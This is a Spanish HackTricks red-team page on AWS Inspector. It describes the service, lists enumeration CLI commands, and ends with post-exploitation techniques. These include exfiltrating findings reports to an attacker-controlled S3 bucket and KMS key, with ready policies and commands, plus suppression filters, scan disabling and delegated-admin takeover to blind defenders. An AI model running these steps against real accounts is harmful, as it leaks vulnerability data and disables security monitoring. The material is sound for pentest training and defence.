AWS - Inspector Enum

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

Inspector

Amazon Inspector es un servicio avanzado y automatizado de gesti贸n de vulnerabilidades dise帽ado para mejorar la seguridad de su entorno AWS. Este servicio escanea continuamente instancias de Amazon EC2, im谩genes de contenedores en Amazon ECR, Amazon ECS y funciones de AWS Lambda en busca de vulnerabilidades y exposiciones de red no intencionadas. Al aprovechar una robusta base de datos de inteligencia de vulnerabilidades, Amazon Inspector proporciona hallazgos detallados, incluidos niveles de severidad y recomendaciones de remediaci贸n, ayudando a las organizaciones a identificar y abordar proactivamente los riesgos de seguridad. Este enfoque integral asegura una postura de seguridad fortalecida en varios servicios de AWS, ayudando en el cumplimiento y la gesti贸n de riesgos.

Elementos clave

Hallazgos

Los hallazgos en Amazon Inspector son informes detallados sobre vulnerabilidades y exposiciones descubiertas durante el escaneo de instancias de EC2, repositorios de ECR o funciones de Lambda. Seg煤n su estado, los hallazgos se clasifican como:

  • Activo: El hallazgo no ha sido remediado.
  • Cerrado: El hallazgo ha sido remediado.
  • Suprimido: El hallazgo ha sido marcado con este estado debido a una o m谩s reglas de supresi贸n.

Los hallazgos tambi茅n se clasifican en los siguientes tres tipos:

  • Paquete: Estos hallazgos se relacionan con vulnerabilidades en paquetes de software instalados en sus recursos. Ejemplos incluyen bibliotecas desactualizadas o dependencias con problemas de seguridad conocidos.
  • C贸digo: Esta categor铆a incluye vulnerabilidades encontradas en el c贸digo de aplicaciones que se ejecutan en sus recursos de AWS. Los problemas comunes son errores de codificaci贸n o pr谩cticas inseguras que podr铆an llevar a brechas de seguridad.
  • Red: Los hallazgos de red identifican exposiciones potenciales en configuraciones de red que podr铆an ser explotadas por atacantes. Estos incluyen puertos abiertos, protocolos de red inseguros y grupos de seguridad mal configurados.

Filtros y Reglas de Supresi贸n

Los filtros y las reglas de supresi贸n en Amazon Inspector ayudan a gestionar y priorizar los hallazgos. Los filtros le permiten refinar los hallazgos seg煤n criterios espec铆ficos, como severidad o tipo de recurso. Las reglas de supresi贸n le permiten suprimir ciertos hallazgos que se consideran de bajo riesgo, que ya han sido mitigados, o por cualquier otra raz贸n importante, evitando que sobrecarguen sus informes de seguridad y permiti茅ndole centrarse en problemas m谩s cr铆ticos.

Software Bill of Materials (SBOM)

Un Software Bill of Materials (SBOM) en Amazon Inspector es una lista de inventario anidada exportable que detalla todos los componentes dentro de un paquete de software, incluidas bibliotecas y dependencias. Los SBOM ayudan a proporcionar transparencia en la cadena de suministro de software, permitiendo una mejor gesti贸n de vulnerabilidades y cumplimiento. Son cruciales para identificar y mitigar riesgos asociados con componentes de software de c贸digo abierto y de terceros.

Caracter铆sticas clave

Exportar hallazgos

Amazon Inspector ofrece la capacidad de exportar hallazgos a Amazon S3 Buckets, Amazon EventBridge y AWS Security Hub, lo que le permite generar informes detallados de vulnerabilidades y exposiciones identificadas para un an谩lisis posterior o compartir en una fecha y hora espec铆ficas. Esta funci贸n admite varios formatos de salida, como CSV y JSON, facilitando la integraci贸n con otras herramientas y sistemas. La funcionalidad de exportaci贸n permite la personalizaci贸n de los datos incluidos en los informes, lo que le permite filtrar hallazgos seg煤n criterios espec铆ficos como severidad, tipo de recurso o rango de fechas e incluir por defecto todos sus hallazgos en la Regi贸n AWS actual con un estado Activo.

Al exportar hallazgos, se necesita una clave de Key Management Service (KMS) para cifrar los datos durante la exportaci贸n. Las claves KMS aseguran que los hallazgos exportados est茅n protegidos contra accesos no autorizados, proporcionando una capa adicional de seguridad para la informaci贸n sensible sobre vulnerabilidades.

Escaneo de instancias de Amazon EC2

Amazon Inspector ofrece capacidades de escaneo robustas para instancias de Amazon EC2 para detectar vulnerabilidades y problemas de seguridad. Inspector compar贸 los metadatos extra铆dos de la instancia de EC2 con reglas de avisos de seguridad para producir vulnerabilidades de paquetes y problemas de accesibilidad de red. Estos escaneos se pueden realizar a trav茅s de m茅todos basados en agente o sin agente, dependiendo de la configuraci贸n de los ajustes de modo de escaneo de su cuenta.

  • Basado en Agente: Utiliza el agente de AWS Systems Manager (SSM) para realizar escaneos en profundidad. Este m茅todo permite una recopilaci贸n y an谩lisis de datos exhaustivos directamente desde la instancia.
  • Sin Agente: Proporciona una alternativa ligera que no requiere la instalaci贸n de un agente en la instancia, creando un snapshot de EBS de cada volumen de la instancia de EC2, buscando vulnerabilidades y luego elimin谩ndolo; aprovechando la infraestructura existente de AWS para el escaneo.

El modo de escaneo determina qu茅 m茅todo se utilizar谩 para realizar escaneos de EC2:

  • Basado en Agente: Implica la instalaci贸n del agente SSM en instancias de EC2 para una inspecci贸n profunda.
  • Escaneo H铆brido: Combina m茅todos basados en agente y sin agente para maximizar la cobertura y minimizar el impacto en el rendimiento. En aquellas instancias de EC2 donde se ha instalado el agente SSM, Inspector realizar谩 un escaneo basado en agente, y para aquellas donde no hay agente SSM, el escaneo realizado ser谩 sin agente.

Otra caracter铆stica importante es la inspecci贸n profunda para instancias de EC2 Linux. Esta funci贸n ofrece un an谩lisis exhaustivo del software y la configuraci贸n de las instancias de EC2 Linux, proporcionando evaluaciones detalladas de vulnerabilidades, incluidas vulnerabilidades del sistema operativo, vulnerabilidades de aplicaciones y configuraciones incorrectas, asegurando una evaluaci贸n de seguridad integral. Esto se logra a trav茅s de la inspecci贸n de rutas personalizadas y todos sus subdirectorios. Por defecto, Amazon Inspector escanear谩 lo siguiente, pero cada cuenta miembro puede definir hasta 5 rutas personalizadas m谩s, y cada administrador delegado hasta 10:

  • /usr/lib
  • /usr/lib64
  • /usr/local/lib
  • /usr/local/lib64

Escaneo de im谩genes de contenedores de Amazon ECR

Amazon Inspector proporciona capacidades de escaneo robustas para im谩genes de contenedores de Amazon Elastic Container Registry (ECR), asegurando que las vulnerabilidades de paquetes sean detectadas y gestionadas de manera eficiente.

  • Escaneo B谩sico: Este es un escaneo r谩pido y ligero que identifica vulnerabilidades conocidas de paquetes de SO en im谩genes de contenedores utilizando un conjunto est谩ndar de reglas del proyecto de c贸digo abierto Clair. Con esta configuraci贸n de escaneo, sus repositorios ser谩n escaneados al hacer push, o realizando escaneos manuales.
  • Escaneo Mejorado: Esta opci贸n agrega la funci贸n de escaneo continuo adem谩s del escaneo al hacer push. El escaneo mejorado profundiza en las capas de cada imagen de contenedor para identificar vulnerabilidades en paquetes de SO y en paquetes de lenguajes de programaci贸n con mayor precisi贸n. Analiza tanto la imagen base como cualquier capa adicional, proporcionando una vista completa de los posibles problemas de seguridad.

Escaneo de funciones de Amazon Lambda

Amazon Inspector incluye capacidades de escaneo completas para funciones de AWS Lambda y sus capas, asegurando la seguridad e integridad de las aplicaciones sin servidor. Inspector ofrece dos tipos de escaneo para funciones de Lambda:

  • Escaneo est谩ndar de Lambda: Esta funci贸n predeterminada identifica vulnerabilidades de software en las dependencias del paquete de aplicaci贸n a帽adidas a su funci贸n de Lambda y capas. Por ejemplo, si su funci贸n utiliza una versi贸n de una biblioteca como python-jwt con una vulnerabilidad conocida, genera un hallazgo.
  • Escaneo de c贸digo de Lambda: Analiza el c贸digo de la aplicaci贸n personalizada en busca de problemas de seguridad, detectando vulnerabilidades como fallos de inyecci贸n, filtraciones de datos, criptograf铆a d茅bil y falta de cifrado. Captura fragmentos de c贸digo que destacan las vulnerabilidades detectadas, como credenciales codificadas. Los hallazgos incluyen sugerencias detalladas de remediaci贸n y fragmentos de c贸digo para solucionar los problemas.

Escaneos del Center for Internet Security (CIS)

Amazon Inspector incluye escaneos del CIS para evaluar los sistemas operativos de las instancias de Amazon EC2 en comparaci贸n con las recomendaciones de mejores pr谩cticas del Center for Internet Security (CIS). Estos escaneos aseguran que las configuraciones se adhieran a las l铆neas base de seguridad est谩ndar de la industria.

  • Configuraci贸n: Los escaneos del CIS eval煤an si las configuraciones del sistema cumplen con recomendaciones espec铆ficas del CIS Benchmark, con cada verificaci贸n vinculada a un ID de verificaci贸n y t铆tulo del CIS.
  • Ejecuci贸n: Los escaneos se realizan o programan en funci贸n de las etiquetas de las instancias y los horarios definidos.
  • Resultados: Los resultados posteriores al escaneo indican qu茅 verificaciones pasaron, se saltaron o fallaron, proporcionando informaci贸n sobre la postura de seguridad de cada instancia.

Enumeraci贸n

# Administrator and member accounts #

## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
aws inspector2 get-delegated-admin-account

## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
aws inspector2 list-members [--only-associated | --no-only-associated]
## Retrieve information about a member account (ReadOnlyAccess policy is enough for this)
aws inspector2 get-member --account-id <value>
## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-account-status [--account-ids <value>]
## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-free-trial-info --account-ids <value>
## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator)
aws inspector2 batch-get-member-ec2-deep-inspection-status [--account-ids <value>]

## List an account's permissions associated with AWS Inspector
aws inspector2 list-account-permissions

# Findings #

## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
aws inspector2 list-findings
## Retrieve vulnerability intelligence details for the specified findings
aws inspector2 batch-get-finding-details --finding-arns <value>
## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
## Retrieve code snippet information about one or more specified code vulnerability findings
aws inspector2 batch-get-code-snippet --finding-arns <value>
## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
aws inspector2 get-findings-report-status --report-id <value>

# CIS #

## List CIS scan configurations (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scan-configurations
## List the completed CIS scans (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scans
## Retrieve a report from a completed CIS scan
aws inspector2 get-cis-scan-report --scan-arn <value> [--target-accounts <value>]
## Retrieve details about the specific CIS scan over the specified resource
aws inspector2 get-cis-scan-result-details --account-id <value> --scan-arn <value> --target-resource-id <value>
## List CIS scan results broken down by check
aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn <value>
## List CIS scan results broken down by target resource
aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn <value>

# Configuration #

## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this)
aws inspector2 describe-organization-configuration
## Retrieve the configuration settings about EC2 scan and ECR re-scan
aws inspector2 get-configuration
## Retrieve EC2 Deep Inspection configuration associated with your account
aws inspector2 get-ec2-deep-inspection-configuration

# Miscellaneous #

## Retrieve the details of a Software Bill of Materials (SBOM) report
aws inspector2 get-sbom-export --report-id <value>

## Retrieve the coverage details for the specified vulnerabilities
aws inspector2 search-vulnerabilities --filter-criteria <vulnerabilityIds=id1,id2..>

## Retrieve the tags attached to the specified resource
aws inspector2 list-tags-for-resource --resource-arn <value>

## Retrieve the AWS KMS key used to encrypt the specified code snippets
aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CONTAINER_IMAGE | AWS_ECR_REPOSITORY | AWS_LAMBDA_FUNCTION> --scan-type <NETWORK | PACKAGE | CODE>

## List the filters associated to your AWS account
aws inspector2 list-filters

## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage
## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage-statistics

## List the aggregated usage total over the last 30 days
aws inspector2 list-usage-totals [--account-ids <value>]

### INSPECTOR CLASSIC ###

## Assessments info, there is a "describe" action for each one to get more info
aws inspector list-assessment-runs
aws inspector list-assessment-targets
aws inspector list-assessment-templates
aws inspector list-event-subscriptions

## Get findings
aws inspector list-findings

## Get exclusions
aws inspector list-exclusions --assessment-run-arn <arn>

## Rule packages
aws inspector list-rules-packages

Post Explotaci贸n

Tip

Desde la perspectiva de un atacante, este servicio puede ayudar al atacante a encontrar vulnerabilidades y exposiciones de red que podr铆an ayudarle a comprometer otras instancias/contenedores.

Sin embargo, un atacante tambi茅n podr铆a estar interesado en interrumpir este servicio para que la v铆ctima no pueda ver vulnerabilidades (todas o espec铆ficas).

inspector2:CreateFindingsReport, inspector2:CreateSBOMReport

Un atacante podr铆a generar informes detallados de vulnerabilidades o listas de materiales de software (SBOM) y exfiltrarlos de su entorno de AWS. Esta informaci贸n podr铆a ser explotada para identificar debilidades espec铆ficas, software desactualizado o dependencias inseguras, lo que permitir铆a ataques dirigidos.

# Findings report
aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
# SBOM report
aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]

El siguiente ejemplo muestra c贸mo exfiltrar todos los hallazgos activos de Amazon Inspector a un bucket de Amazon S3 controlado por el atacante con una clave de Amazon KMS controlada por el atacante:

  1. Crea un bucket de Amazon S3 y adjunta una pol铆tica para que sea accesible desde el Amazon Inspector de la v铆ctima:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "allow-inspector",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"],
"Resource": "arn:aws:s3:::inspector-findings/*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
},
"ArnLike": {
"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
}
}
}
]
}
  1. Crea una clave de Amazon KMS y adjunta una pol铆tica a ella para que sea utilizable por el Amazon Inspector de la v铆ctima:
{
"Version": "2012-10-17",
"Id": "key-policy",
"Statement": [
{
...
},
{
"Sid": "Allow victim Amazon Inspector to use the key",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
}
}
}
]
}
  1. Ejecuta el comando para crear el informe de hallazgos exfiltr谩ndolo:
aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f
  • Impacto Potencial: Generaci贸n y exfiltraci贸n de informes detallados de vulnerabilidades y software, obteniendo informaci贸n sobre vulnerabilidades espec铆ficas y debilidades de seguridad.

inspector2:CancelFindingsReport, inspector2:CancelSbomExport

Un atacante podr铆a cancelar la generaci贸n del informe de hallazgos especificado o del informe SBOM, impidiendo que los equipos de seguridad reciban informaci贸n oportuna sobre vulnerabilidades y la lista de materiales de software (SBOM), retrasando la detecci贸n y remediaci贸n de problemas de seguridad.

# Cancel findings report generation
aws inspector2 cancel-findings-report --report-id <value>
# Cancel SBOM report generatiom
aws inspector2 cancel-sbom-export --report-id <value>
  • Impacto Potencial: Disrupci贸n de la monitorizaci贸n de seguridad y prevenci贸n de la detecci贸n y remediaci贸n oportuna de problemas de seguridad.

inspector2:CreateFilter, inspector2:UpdateFilter, inspector2:DeleteFilter

Un atacante con estos permisos podr铆a manipular las reglas de filtrado que determinan qu茅 vulnerabilidades y problemas de seguridad se informan o suprimen (si la acci贸n est谩 configurada en SUPPRESS, se crear铆a una regla de supresi贸n). Esto podr铆a ocultar vulnerabilidades cr铆ticas a los administradores de seguridad, facilitando la explotaci贸n de estas debilidades sin detecci贸n. Al alterar o eliminar filtros importantes, un atacante tambi茅n podr铆a crear ruido inundando el sistema con hallazgos irrelevantes, obstaculizando la monitorizaci贸n y respuesta de seguridad efectivas.

# Create
aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
# Update
aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [--filter-criteria <value>] [--reason <value>]
# Delete
aws inspector2 delete-filter --arn <value>
  • Impacto Potencial: Ocultaci贸n o supresi贸n de vulnerabilidades cr铆ticas, o inundaci贸n del sistema con hallazgos irrelevantes.

inspector2:DisableDelegatedAdminAccount, (inspector2:EnableDelegatedAdminAccount & organizations:ListDelegatedAdministrators & organizations:EnableAWSServiceAccess & iam:CreateServiceLinkedRole)

Un atacante podr铆a interrumpir significativamente la estructura de gesti贸n de seguridad.

  • Al deshabilitar la cuenta de administrador delegado, el atacante podr铆a impedir que el equipo de seguridad acceda y gestione la configuraci贸n y los informes de Amazon Inspector.
  • Habilitar una cuenta de administrador no autorizada permitir铆a a un atacante controlar las configuraciones de seguridad, potencialmente deshabilitando escaneos o modificando configuraciones para ocultar actividades maliciosas.

Warning

Se requiere que la cuenta no autorizada est茅 en la misma Organizaci贸n que la v铆ctima para convertirse en el administrador delegado.

Para que la cuenta no autorizada se convierta en el administrador delegado, tambi茅n se requiere que despu茅s de que el administrador delegado leg铆timo sea deshabilitado, y antes de que la cuenta no autorizada sea habilitada como el administrador delegado, el administrador leg铆timo debe ser desregistrado como el administrador delegado de la organizaci贸n. Esto se puede hacer con el siguiente comando (organizations:DeregisterDelegatedAdministrator permiso requerido): aws organizations deregister-delegated-administrator --account-id <legit-account-id> --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)

# Disable
aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
# Enable
aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>
  • Impacto Potencial: Disrupci贸n de la gesti贸n de seguridad.

inspector2:AssociateMember, inspector2:DisassociateMember

Un atacante podr铆a manipular la asociaci贸n de cuentas miembros dentro de una organizaci贸n de Amazon Inspector. Al asociar cuentas no autorizadas o desasociar cuentas leg铆timas, un atacante podr铆a controlar qu茅 cuentas se incluyen en los escaneos de seguridad y en los informes. Esto podr铆a llevar a que cuentas cr铆ticas sean excluidas de la monitorizaci贸n de seguridad, permitiendo al atacante explotar vulnerabilidades en esas cuentas sin ser detectado.

Warning

Esta acci贸n debe ser realizada por el administrador delegado.

# Associate
aws inspector2 associate-member --account-id <value>
# Disassociate
aws inspector2 disassociate-member --account-id <value>
  • Impacto Potencial: Exclusi贸n de cuentas clave de los escaneos de seguridad, permitiendo la explotaci贸n no detectada de vulnerabilidades.

inspector2:Disable, (inspector2:Enable & iam:CreateServiceLinkedRole)

Un atacante con el permiso inspector2:Disable podr铆a deshabilitar los escaneos de seguridad en tipos de recursos espec铆ficos (EC2, ECR, Lambda, c贸digo de Lambda) sobre las cuentas especificadas, dejando partes del entorno de AWS sin supervisi贸n y vulnerables a ataques. Adem谩s, gracias a los permisos inspector2:Enable & iam:CreateServiceLinkedRole, un atacante podr铆a volver a habilitar escaneos selectivamente para evitar la detecci贸n de configuraciones sospechosas.

Warning

Esta acci贸n debe ser realizada por el administrador delegado.

# Disable
aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
# Enable
aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]
  • Impacto Potencial: Creaci贸n de puntos ciegos en la monitorizaci贸n de seguridad.

inspector2:UpdateOrganizationConfiguration

Un atacante con este permiso podr铆a actualizar las configuraciones para su organizaci贸n de Amazon Inspector, afectando las caracter铆sticas de escaneo predeterminadas habilitadas para nuevas cuentas de miembros.

Warning

Esta acci贸n debe ser realizada por el administrador delegado.

aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>
  • Impacto Potencial: Alterar pol铆ticas y configuraciones de escaneo de seguridad para la organizaci贸n.

inspector2:TagResource, inspector2:UntagResource

Un atacante podr铆a manipular etiquetas en los recursos de AWS Inspector, que son cr铆ticos para organizar, rastrear y automatizar evaluaciones de seguridad. Al alterar o eliminar etiquetas, un atacante podr铆a potencialmente ocultar vulnerabilidades de los escaneos de seguridad, interrumpir los informes de cumplimiento e interferir con los procesos de remediaci贸n automatizados, lo que llevar铆a a problemas de seguridad no controlados y a la integridad del sistema comprometida.

aws inspector2 tag-resource --resource-arn <value> --tags <value>
aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>
  • Impacto Potencial: Ocultamiento de vulnerabilidades, interrupci贸n de informes de cumplimiento, interrupci贸n de la automatizaci贸n de seguridad e interrupci贸n de la asignaci贸n de costos.

Referencias

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks